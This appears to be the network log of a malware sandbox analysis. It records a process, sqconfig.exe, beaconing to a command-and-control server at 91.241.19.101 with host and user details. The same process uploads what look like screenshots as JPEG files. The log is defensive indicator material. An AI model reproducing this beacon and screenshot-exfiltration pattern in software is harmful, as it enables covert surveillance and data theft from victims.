                                                                  67192.168.2.34987391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:11.436705112 CEST13767OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:11.660429955 CEST13808INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:11 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  68192.168.2.34987491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:11.447889090 CEST13767OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:11.448026896 CEST13767OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:11.448239088 CEST13777OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:11.448344946 CEST13780OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:11.577120066 CEST13787OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:11.577483892 CEST13789OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:11.577579975 CEST13806OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:11.706320047 CEST13811OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:11.706376076 CEST13814OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:53:11.706393003 CEST13819OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:53:11.706407070 CEST13824OUTData Raw: 2a 9b 69 04 09 3c 20 05 67 42 37 64 ee 63 b4 e4 b1 f5 aa da 46 a5 a4 69 5e 19 d2 f5 66 3a 94 29 67 ae cf 3d a5 b4 7b 25 69 48 86 12 12 49 72 9b 54 f0 09 08 78 27 8a 9f 6c ed 7f eb 57 61 fb 25 7f eb a2 b9 ca ae 8b aa b6 96 75 55 d2 ef 8e 9c 01 26
                                                                  Data Ascii: *i< gB7dcFi^f:)g={%iHIrTx'lWa%uU&[^I'gnSf%aH[V3_n].D%e%p7)Qb:~v'hbe96F<|goN)y+_ok_Gcy4C.Qbb/<#5.
                                                                  Sep 30, 2021 23:53:11.899471045 CEST13858INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:11 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  69192.168.2.34987691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:11.890829086 CEST13858OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:12.117202044 CEST13861INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:12 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  7192.168.2.34976691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:51.167845011 CEST7236OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:51.376322985 CEST7237INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:51 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:52:51.564985991 CEST7237OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----a925bc230fdbeec72a266ea97d6eb24e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86299
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:52:51.575602055 CEST7237OUTData Raw: 2d 2d 2d 2d 2d 2d 61 39 32 35 62 63 32 33 30 66 64 62 65 65 63 37 32 61 32 36 36 65 61 39 37 64 36 65 62 32 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------a925bc230fdbeec72a266ea97d6eb24eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:52:51.575664043 CEST7247OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:52:51.575695992 CEST7250OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:52:51.700579882 CEST7269OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:52:51.700649977 CEST7271OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:52:51.700659990 CEST7274OUTData Raw: c7 87 18 ff 00 d3 33 5e 2f 7e df be 73 fe d1 af 3b 28 5e f4 cf 7b 39 77 f6 7e 87 a1 59 71 f0 ee 0f a8 fe 75 cc c9 5d 25 a1 c7 c3 bb 6f 73 fd 6b 97 95 c8 27 da b4 c2 2f 7a 7e ac e4 cc dd 94 3d 11 13 92 0f 06 90 4b 20 e8 e4 7e 34 84 e6 9b 5e 8d 91
                                                                  Data Ascii: 3^/~s;(^{9w~Yqu]%osk'/z~=K ~4^;NrgOXoE.Hu,i'AMkI>bq+[2wqVE~5lCT<GsMu5XO-&<Jii-iD'kg/TF5W+9+zO7:&r#
                                                                  Sep 30, 2021 23:52:51.700665951 CEST7277OUTData Raw: 1b b9 5f ba 43 55 77 d1 2f 13 fe 59 67 e9 54 b1 34 de cc 87 82 ad 1d d1 98 bd 71 4f c5 59 6d 3e e1 3a c2 c3 f0 a6 18 64 1d 50 8f c2 ab da 45 ec c5 ec 66 b7 44 60 66 a4 14 6d 22 94 0c d1 72 94 5a 1d 4a 29 31 4e 02 a6 e5 0a 29 d4 80 52 81 52 cb 48
                                                                  Data Ascii: _CUw/YgT4qOYm>:dPEfD`fm"rZJ)1N)RRHP)S@Z|A?.kA?/O?:{?KIid<#a{xV@X9w* ^o""g_03L#1'$9$5utf-Y4QLQ`y |+,|Av
                                                                  Sep 30, 2021 23:52:51.826297045 CEST7285OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:52:51.826368093 CEST7301OUTData Raw: dc 1f 4a ee bc 69 f1 06 d3 c6 3e 05 b4 b6 78 cd be a9 0d ea 3c b0 80 4a b2 84 70 59 4f a6 48 e0 f2 33 df ad 78 79 86 02 a5 6a ea 4b 67 a7 a1 df 86 c4 46 9d 36 9e e8 f6 d8 bb 55 b8 eb e3 f1 4b 59 2c 83 fe 9e 7e 1f f0 4b 79 8f f7 7f 1f f8 01 4b 8a
                                                                  Data Ascii: Ji>x<JpYOH3xyjKgF6UKY,~KyKJQ_FyaKICGBA5W4OGl?enq9%(xjIoyr^n=1"A"|bO,6>qbXTrODKe[JmKs^k=
                                                                  Sep 30, 2021 23:52:51.826411009 CEST7320OUTData Raw: e9 ec cc bf b4 78 6f c0 da 7c 91 da 14 69 e4 39 10 a3 ef 96 66 ec 3d 87 e9 51 69 5a 5d dd 9f 86 35 ab fd 44 6d bf d4 63 96 79 53 fb 83 61 da bf 86 4f e7 8a d8 d3 7c 2d a2 69 13 79 d6 5a 74 51 ca 3a 3b 12 ec 3e 85 89 23 f0 ab 5a d7 fc 80 75 1f fa
                                                                  Data Ascii: xo|i9f=QiZ]5DmcySaO|-iyZtQ:;>#Zu@4UvaJemR]61Z)E2B){LE.E4b0Ryt;2`Sq74&1J8L)>@KGzE\wGEE|jC15(2&i]FsIEiE6)
                                                                  Sep 30, 2021 23:52:52.044698954 CEST7324INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:51 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  70192.168.2.34987891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:12.253623962 CEST13953OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:12.253647089 CEST13953OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:12.253829002 CEST13978OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:12.253874063 CEST13982OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:12.392687082 CEST14163OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:12.393300056 CEST14168OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:12.393338919 CEST14175OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:53:12.533226013 CEST14706OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:12.533369064 CEST14712OUTData Raw: 2a 9b 69 04 09 3c 20 05 67 42 37 64 ee 63 b4 e4 b1 f5 aa da 46 a5 a4 69 5e 19 d2 f5 66 3a 94 29 67 ae cf 3d a5 b4 7b 25 69 48 86 12 12 49 72 9b 54 f0 09 08 78 27 8a 9f 6c ed 7f eb 57 61 fb 25 7f eb a2 b9 ca ae 8b aa b6 96 75 55 d2 ef 8e 9c 01 26
                                                                  Data Ascii: *i< gB7dcFi^f:)g={%iHIrTx'lWa%uU&[^I'gnSf%aH[V3_n].D%e%p7)Qb:~v'hbe96F<|goN)y+_ok_Gcy4C.Qbb/<#5.
                                                                  Sep 30, 2021 23:53:12.533385038 CEST14720OUTData Raw: 15 bf e2 75 ce a0 bf ee 0a c6 58 ce 2b 97 0a ff 00 75 11 e3 22 dd 66 43 8e 69 c0 73 de a6 11 7b 54 8b 03 1e 8a 6b 67 34 8c 15 29 3e 85 60 b4 e0 86 ae a5 94 ad d1 1b f2 ab 09 a5 5c 3f fc b3 6a cd d6 8a dd 9b 47 0f 37 d0 cc 09 52 04 f6 ad 75 d1 67
                                                                  Data Ascii: uX+u"fCis{Tkg4)>`\?jG7Rug WHUY2/Y<LVf(OjxLViSYK}*}LA-33RZu&/6=j&<W_Ua4T'__k){:~l7pL2c
                                                                  Sep 30, 2021 23:53:12.533555984 CEST14722OUTData Raw: 8c 93 dc fc a3 00 7b 9a c2 82 7f 17 f8 81 45 dd b4 b6 fa 2d 93 f3 12 bc 42 59 59 7b 12 08 c7 3f 85 41 ac a0 bd 9f c1 9a 6c dc db 4c 7c d9 13 b3 14 8d 48 07 db 93 f9 d4 9e 35 d6 75 1b 7d 4f 4c d2 34 fb b4 b1 fb 59 25 ee 5f 1c 0c e0 0c f6 ff 00 f5
                                                                  Data Ascii: {E-BYY{?AlL|H5u}OL4Y%_TPTR%u|]Eik1"Tl-A%1\MSn!}z:%!M?=.|bG?*+V5giP[Wv
                                                                  Sep 30, 2021 23:53:12.726732016 CEST14822INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:12 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  71192.168.2.34987991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:12.375405073 CEST14125OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:12.586694002 CEST14821INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:12 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  72192.168.2.34988091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:12.832335949 CEST14822OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:13.021737099 CEST14823INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:12 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
